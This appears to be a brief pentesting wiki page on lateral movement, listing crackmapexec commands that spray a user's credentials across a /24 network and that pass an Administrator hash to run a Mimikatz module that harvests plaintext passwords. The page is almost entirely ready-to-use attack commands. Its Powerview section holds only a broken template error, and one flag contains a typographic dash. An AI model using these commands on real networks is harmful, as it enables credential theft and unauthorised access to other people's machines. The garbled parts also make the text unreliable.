Lateral Movement


To check if the credentials $USER / $PASSWORDS are used in more computers in the network:

$crackmapexec $IP/24 -u $USER -p $PASSWORD –lusers

Or using an Administrator hash and execute Mimikatz for plain text password gathering:

$crackmapexec $IP/24 -u Administrator -H $HASH -d $DOMAIN -m modules/credentials/

Run Powerview commands in crackmapexec:

Parameter 1 not defined. For correct usage see template's documention.

Other techniques for lateral movements are described in the category Category:Lateral Movement